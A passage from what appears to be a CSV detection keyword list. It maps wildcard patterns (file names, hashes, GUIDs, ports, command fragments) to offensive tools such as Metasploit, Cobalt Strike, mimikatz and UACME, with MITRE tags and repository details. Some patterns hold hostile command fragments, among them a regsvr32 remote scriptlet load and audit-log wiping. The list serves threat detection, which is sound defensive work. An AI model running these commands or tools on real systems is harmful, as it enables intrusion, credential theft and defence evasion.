large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_lsass.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*_lsassdecrypt.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*_mouse_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_msfvenom*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_nimplant_*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*_peloader.dll*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*_posh-common*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*_prefix_PEzor_*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*_pycobalt_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*_Shellcode.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*_tcp_cc2(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*_udp_cc2(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*{process_to_inject}.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*| favfreak*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*| hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*|base64 -d > /tmp/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*~/.csexec*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*< /dev/console | uudecode && uncompress*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*<3 eo.oe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"**","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" +"*== NoPowerShell v* ==*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*=Administrator.ccache*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*=imaohw*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed whoami","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*=resu ten*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*> /var/log/audit/audit.log* rm -f .*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" +"*0.0.0.0:2222*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*0.0.0.0:4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*0.0.0.0:4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*0.0.0.0:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*00_create_all_modules_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*0041d09d62db1cfe06bcb45c6b007af3b6d8c6cb419948e49141188f453a329b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*01_all_exploits_have_payloads_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0472A393-9503-491D-B6DA-FA47CD567EDE*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*04845492-BD9E-4EC6-ACA4-4A0A460B3508*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*04ca7e137e1e9feead96a7df45bb67d5ab3de190*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*04FC654C-D89A-44F9-9E34-6D95CE152E9D*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*05a2c8c165e431e852c4bcafbfccb27b9e8c0428d2c975ceef94c98639f1c7d8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*07EF7652-1C2D-478B-BB4B-F9560695A387*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files 